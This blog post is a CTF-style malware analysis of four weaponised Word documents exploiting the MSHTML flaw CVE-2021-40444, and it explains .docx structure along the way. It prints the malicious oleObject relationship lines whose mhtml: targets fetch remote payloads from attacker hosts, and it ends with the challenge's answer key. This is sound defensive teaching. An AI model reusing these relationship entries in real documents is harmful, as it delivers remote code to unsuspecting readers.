MSHTML & OOXML (.docx) Analysis
Uncover how attackers exploit .docx files using MSHTML components like mhtml. Learn to analyze .docx structures exposing malicious metadata and payloads.
Hey guys, its been a minute since I wrote something (busy adult & work life … lol 😅). Anyways, Ever wondered how a simple Word document can hide dangerous cyber threats? 🤔 In this blog, I’m discussing my latest research into .docx
files and MSHTML
exploits, inspired by LetsDefend MSHTML Challenge Credits to the creator - Bohan Zhang- a Threat Intelligence Analyst. We’ll dive into the sneaky ways attackers exploit .docx
files using MSHTML components like mhtml:
strings, unpack OOXML structures with tools like zipdump.py
, and hunt for malicious metadata/payloads. This one’s a bit technical, so grab your coffee and let’s get started! ☕💻.
Huge shoutout to my buddy d3xt3r for the research support and motivation.
Check out my other blogs for more tips on investigating malicious documents:
Brief
We’re tasked with analyzing four malicious document samples from MalwareBazaar suspected of exploiting a specific vulnerability. The lab involves hunting for suspicious domains and IP addresses.
To download the samples, use one of these hashsums:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜ md5sum *
45e7d6562bfddb816d45649dd667abde Employee_W2_Form.docx
d5742309ba8146be9eab4396fde77e4e Employees_Contact_Audit_Oct_2021.docx
41dacae2a33ee717abcc8011b705f2cb Work_From_Home_Survey.doc
55998cb43459159a5ed4511f00ff3fc8 income_tax_and_benefit_return_2021.docx
➜ sha256sum *
679bbe0c50754853978a3a583505ebb99bce720cf26a6aaf8be06cd879701ff1 Employee_W2_Form.docx
ed2b9e22aef3e545814519151528b2d11a5e73d1b2119c067e672b653ab6855a Employees_Contact_Audit_Oct_2021.docx
84674acffba5101c8ac518019a9afe2a78a675ef3525a44dceddeed8a0092c69 Work_From_Home_Survey.doc
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745 income_tax_and_benefit_return_2021.docx
➜ sha1sum *
00087e46ec0ef6225de59868fd016bd9dd77fa3c Employee_W2_Form.docx
8aaa79ee4a81d02e1023a03aee62a47162a9ff04 Employees_Contact_Audit_Oct_2021.docx
4b35d14a2eab2b3a7e0b40b71955cdd36e06b4b9 Work_From_Home_Survey.doc
9bec2182cc5b41fe8783bb7ab6e577bac5c19f04 income_tax_and_benefit_return_2021.docx
root@ip-172-31-6-252:~/Desktop/ChallengeFiles#
Remember to deal with suspicious files in a sandbox environment.
Lets start by first understanding what a DOC & DOCX Files are.
What is a DOC & DOCX File?
Simply put:
- A DOCX file is the standard file format for documents created in Microsoft Word, introduced as an upgrade to the older DOC format in 2007. It’s a part of the Office Open XML (OOXML) standard, which uses XML (Extensible Markup Language) to store document content, styles, and other elements. It also uses ZIP compression to keep file sizes small.
- A DOC file is a Microsoft Word document format, specifically the older format used by versions of Word before 2007. DOC files are based on the binary interchange file format (BIFF), which stores information as binary files. In a DOC file, data are organized as a collection of records and structures arranged in binary streams
In terms of magic bytes, a docx file starts with 50 4B 03 04
A doc file on the other end typically start with D0 CF 11 E0 A1 B1 1A E1
Difference between DOC and DOCX
I did a small general comparison for both files:
Characteristics | DOC | DOCX |
---|---|---|
Compatibility | Compatible with older versions of Microsoft Word | Compatible with modern versions of Microsoft Word |
File Extension | .doc | .docx |
File Size | Larger file size due to binary structure | Smaller file size due to better compression and XML format |
File Structure | Binary format, not human-readable | XML-based format, human-readable and machine-readable |
Conversion | Can be converted to DOCX and other formats | Can be converted to other formats and vice versa |
Standardization | No standardized format | Based on the ISO/IEC 29500 standard (Office Open XML) |
LAB
To better understand the OOXML structure of .docx files, I created a demo file from scratch called Lab.docx
using Microsoft Word, with dummy text. (I plan to experiment with Google Docs or Calibre to compare their .docx structures in a future post.) Let’s dive into analyzing Lab.docx to uncover its components and threat potential.
Since a .docx
file is essentially a ZIP archive, you can unzip it using tools like unzip
or 7zip
to reveal its contents for analysis, as demonstrated below.
Tools
For folks who love using Linux or web applications for analysis, I’ll also be sharing some tools and ticks to use. The DidierStevensSuite by Didier Stevens offers a great collection of scripts for analysis. In this blog, we’ll mostly be using the following tools:
- zipdump.py - (ZIP dump utility by Didier Stevens)
- numbers-to-string.py - (Program to convert numbers into a string by Didier Stevens)
- xmldump.py - (This is essentially a wrapper for xml.etree.ElementTree by Didier Stevens)
- re-search.py - (Program to use Python’s re.findall on files by Didier Stevens)
My go to online analyzer for quick analysis is IRIS-H Digital Forensics (Definitely check it out)
Basic Analysis
Continuing with our basic analysis, a documents EXIF data is critical for a researcher as it can reveal metadata like author, creation date, and application version for various purposes. These include:
- Linking the document to a campaign.
- Spot inconsisencies in document timestamps.
- Discover potentially embedded data.
In the structure of a .docx
file, this metadata info is usually stored in two files called docProps/core.xml
and docProps/app.xml
To check the details, simply run the exiftool
command alongside the file in question.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
➜ exiftool Lab.docx
ExifTool Version Number : 13.25
File Name : Lab.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2025:06:05 12:44:12+00:00
File Access Date/Time : 2025:06:05 12:44:21+00:00
File Inode Change Date/Time : 2025:06:05 12:44:12+00:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x576f9132
Zip Compressed Size : 358
Zip Uncompressed Size : 1445
Zip File Name : [Content_Types].xml
Title :
Subject :
Creator : Test Author
Keywords :
Description :
Last Modified By : Test Author
Revision Number : 2
Create Date : 2025:06:05 12:36:00Z
Modify Date : 2025:06:05 12:41:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 1
Words : 23
Characters : 134
Application : Microsoft Office Word
Doc Security : None
Lines : 1
Paragraphs : 1
Scale Crop : No
Company :
Links Up To Date : No
Characters With Spaces : 156
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
As a researcher, details such as: Creator , Create Date, Application, Modify Date, Pages, Words, Characters would matter to me - but I’ll explain this more later in the blog.
Docx Structure
Next, we can use a tool like zipdump
to analyze a ZIP file contents as shown:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜ python3 zipdump.py Lab.docx
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 1980-01-01 00:00:00
2 _rels/.rels 0 1980-01-01 00:00:00
3 word/document.xml 0 1980-01-01 00:00:00
4 word/_rels/document.xml.rels 0 1980-01-01 00:00:00
5 word/theme/theme1.xml 0 1980-01-01 00:00:00
6 word/settings.xml 0 1980-01-01 00:00:00
7 word/numbering.xml 0 1980-01-01 00:00:00
8 word/styles.xml 0 1980-01-01 00:00:00
9 word/webSettings.xml 0 1980-01-01 00:00:00
10 word/fontTable.xml 0 1980-01-01 00:00:00
11 docProps/core.xml 0 1980-01-01 00:00:00
12 docProps/app.xml 0 1980-01-01 00:00:00
Note that each Filename has a different Index number
I’ll leave a small cheat sheet here that you can use for further analysis across the blog post
1
2
3
4
5
6
7
8
9
10
11
12
13
# Examine contents of OOXML file
python3 zipdump.py Lab.docx
or
python3 zipdump.py -i Lab.docx
# Extract file with specific index `3` from a file to STDOUT.
python3 zipdump.py Lab.docx -s 3 -d
# Extract all files
python3 zipdump.py Lab.docx -D
# Print additional information
python3 zipdump.py Lab.docx -e
Simply explained:
SWIPE/DRAG TO VIEW FULL TABLE
File | Purpose | Malware/Research Relevance |
---|---|---|
[Content_Types].xml | Defines MIME types for all parts in the .docx archive. | Can reveal unexpected file types (e.g., .vbs, .exe, .xml) indicating embedded malicious content. |
_rels/.rels | Links top-level components (e.g., document, metadata). Basically defines relationships to document.xml, core.xml, app.xml. | Malicious relationships may point to external resources (e.g., URLs for C2 servers) , remote OLE objects or scripts. |
word/document.xml | Main document content (text, paragraphs, macros, tables, embedded objects). | Common target for: - Macro-based malware (VBA, OLE). - Exploits (e.g., CVE-2017-0199 for remote templates). - Obfuscated scripts (hidden text, XML bombs). |
word/_rels/document.xml.rels | Links external resources (images, hyperlinks, embedded objects). | Used to: - Load malicious payloads from remote URLs. - Reference embedded exploits (e.g., OLE objects). |
word/theme/theme1.xml | Defines visual styling (colors, fonts). | Rarely abused, but could conceal suspicious objects in obfuscated themes |
word/settings.xml | Document settings (macros, protections, external links, zoom, spell-check). | Critical for: - Enabling macros (attack vector). - Disabling security warnings. - Linking to malicious templates ( attachedTemplate ). |
word/numbering.xml | Defines list formatting (bullets, numbering). | Low risk attack surface |
word/styles.xml | Styles (fonts, spacing, hidden text). | Can be used to: - Hide malicious content (e.g., white text). - Obfuscate script fragments in style names. |
word/webSettings.xml | Configures web view or HTML conversion settings. | Rarely malicious, but may contain odd redirects or URLs. |
word/fontTable.xml | Lists fonts used in the document. | Could reference malicious font files (e.g., CVE-2015-3052 font parsing vulns). |
docProps/core.xml | Stores core metadata (e.g., author, creation date). | Useful for: - Attribution (threat actor fingerprints). - Detecting tampering (e.g., fake timestamps). |
docProps/app.xml | Stores app-specific metadata (e.g., word count, Word version, page count). | May reveal anomalies (e.g., mismatched word counts due to hidden content or weaponized toolkits like CactusTorch). |
Visual Overview:
[Content_Types].xml
- Defines the MIME types (content types) of all the parts within the package. It tells the software like Word what kind of data each file contains (e.g., XML, images, etc.).
_rels/.rels
- Contains the root relationships of the document. It points to the key components of the document, such as the main document (word/document.xml
) and metadata files (docProps/core.xml
anddocProps/app.xml
).
word/document.xml
- The main file containing the actual content of the document (text, paragraphs, tables, etc.), stored in a structured XML format. For example the dummy text I had in the document earlier
word/_rels/document.xml.rels
- Contains relationships for resources referenced indocument.xml
, such as hyperlinks, images, styles, or external files.
word/theme/theme1.xml
- Defines the color scheme, fonts, and other visual theme elements used in the document.
word/settings.xml
- Stores document-level settings, such as proofing options, zoom level, compatibility settings, and other Word-specific configurations.
word/numbering.xml
- Defines the numbering (bullets and numbering) styles used in lists throughout the document.
word/styles.xml
word/webSettings.xml
- Stores settings specific to how the document should behave when opened in a web browser or saved as a webpage.
word/fontTable.xml
word/fontTable.xml
- Lists all the fonts used in the document, including fallback fonts if the primary font is not available.
docProps/core.xml
- Contains core document properties (metadata) such as title, author, creation/modification dates, and keywords.
docProps/app.xml
- Contains application-specific metadata, such as word count, page count, and other statistics.
Analysis Samples
Now that we have solid information of the structure of a docx
file, we can start analyzing the suspicious files. Using tools like zipdump.py
, we can dump their file contents using the following syntax:
1
2
3
4
python3 zipdump.py Work_From_Home_Survey.doc
python3 zipdump.py Employee_W2_Form.docx
python3 zipdump.py Employees_Contact_Audit_Oct_2021.docx
python3 zipdump.py Work_From_Home_Survey.doc
Employees_Contact_Audit_Oct_2021.docx
Employee_W2_Form.docx
Work_From_Home_Survey.doc
income_tax_and_benefit_return_2021.docx
I noticed something interesting and common all 4 samples in the word/_rels/document.xml.rels
.
After spending sometime analyzing Employee_W2_Form.docx
for example, Index 13
(word/_rels/document.xml.rels
) piqued my interest after examining most of the files individually.
I noted an interesting string:
MSHTML
Earlier we talked about a file called word/_rels/document.xml.rels
that maps connections between document components and external resources, like links, images, or templates. This file uses XML to define relationships, specifying how parts of the document interact with internal or external content. Now, attackers exploit this structure to embed harmful payloads, often leveraging Microsoft’s MSHTML engine (used for rendering HTML in Internet Explorer) to execute remote code or deliver malware.
document.xml.rels
can be exploited in various way’s such as:
- Remote Template Injection
- Embedding Malicious HTML via MSHTML (eg CVE-2021-40444)
- Follina Exploit (CVE-2022-30190)
- NoRelationship Attack
Malicious files exploiting MSHTML often involve:
- HTML Files - Typically hosteded remotely and reference in the
document.xml.rels
, these files use JavaScript or ActiveX to exploit MSHTML flaws, executing code or downloading payloads like DLLs or executables. - Cabinet (.cab) Files: this type of files have been used in attacks like CVE-2021-40444, where a
.cab
file containing a malicious DLL is fetched via an HTML link indocument.xml.rels
. The DLL is executed via MSHTML’s processing of the.cab
file. - RTF and MHTML Files: Documents can reference RTF or MHTML files that exploit MSHTML vulnerabilities (e.g., CVE-2017-8759), triggering exploits when rendered.
Nicolas Krassas - @Dinosn did post a tweet around Sep 10, 2021 of a clear PoC (By now it doesnt exist) for CVE-2021-40444.
On CVE-2021-40444, a clear PoC https://t.co/qXMj5pKSg3 which is called via mhmtl element on 'word/_rels/document.xml.rels' of a modified docx file.
— Nicolas Krassas (@Dinosn) September 10, 2021
Analysis Continuation …
Back to Employee_W2_Form.docx
, in Index 13
(word/_rels/document.xml.rels
) piqued my interest. I noted the interesting string:
1
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html" TargetMode="External"/>
At a high level:
When the .docx
file is opened, Word processes the document.xml.rels
file and encounters this relationship. The oleObject
relationship triggers MSHTML to fetch and render the MHTML file at arsenal.30cm.tw:1212/word.html
. The MHTML file may contain JavaScript, ActiveX controls, or a reference to another payload (e.g., a .cab file or DLL), exploiting an MSHTML vulnerability to execute code.
if you care about the tiny details, lets break it down:
Id="rId6"
- unique identifier assigned to this relationship within the document.Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
- The Type attribute specifies the type of relationship, in this case, anoleObject
. This indicates that the relationship points to an Object Linking and Embedding (OLE) object, which can be an embedded file, external resource, or ActiveX control.Target="mhtml:arsenal.30cm.tw:1212/word.html!x-usc:arsenal.30cm.tw:1212/word.html"
- The Target attribute specifies the location of the resource being referenced. Here, it points to an external resource using themhtml
protocol, which is associated with MHTML (MIME HTML), a format that combines HTML and its resources into a single file.- The URL
arsenal.30cm.tw:1212/word.html
suggests a remote server (arsenal.30cm.tw) on a non-standard port1212
, hosting a file named word.html. - The
!x-usc:arsenal.30cm.tw:1212/word.html
part is an MHTML-specific syntax, indicating a specific resource within the MHTML archive. Thex-usc
directive is a Microsoft-specific directive used in MHTML to reference resources within an.mht
file or external URLs.
- The URL
TargetMode="External"
- indicates that the resource is external to the document (i.e., not embedded within the.docx
file). Technically this means that the document will attempt to fetch the resource from the specified URL when opened, potentially triggering malicious behavior.
Now that we have that understood, lets fetch the rest of the mhtml attributes from the rest of the documents.
Employees_Contact_Audit_Oct_2021.docx
1
mhtml:http://175.24.190.249/note.html!x-usc:http://175.24.190.249/note.html
income_tax_and_benefit_return_2021.docx
1
mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html
Work_From_Home_Survey.doc
Things got a little interesting on analyzing Work_From_Home_Survey.doc
.
I spotted this obfuscated
1
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://trendparlye.com/wiki0509.html!x-usc:http://trendparlye.com/wiki0509.html" TargetMode="External"/>
1
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://trendparlye.com/wiki0509.html!x-usc:http://trendparlye.com/wiki0509.html" TargetMode="External"
TO BE CONTINUED …
References
- ISO/IEC 29500 standard (Office Open XML)
- Mshtml - Lolbas
- Trident
- SECURITY ALERT: Microsoft MSHTML Remote Code Execution Vulnerability Office 365 0-Day (CVE-2021-40444) - Trend Micro
- Microsoft Security Advisory (CVE-2021-40444)
- Trend Micro Blog: Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs
- SANS_Analysing_Malicious_Docs_Cheat_Sheet.pdf
- SANS_DFPS_FOR610_v1.4_2503.pdf (Under - Cheat Sheet for Analyzing Malicious Documents)
Questions
Examing the Employees_Contact_Audit_Oct_2021.docx file, what is the malicious IP in the docx file?
175.24.190.249
Examing the Employee_W2_Form.docx file, what is the malicious domain in the docx file?
arsenal.30cm.tw
Examing the Work_From_Home_Survey.doc file, what is the malicious domain in the doc file?
trendparlye.com
Examing the income_tax_and_benefit_return_2021.docx, what is the malicious domain in the docx file?
hidusi.com
What is the vulnerability the above files exploited?
cve-2021-40444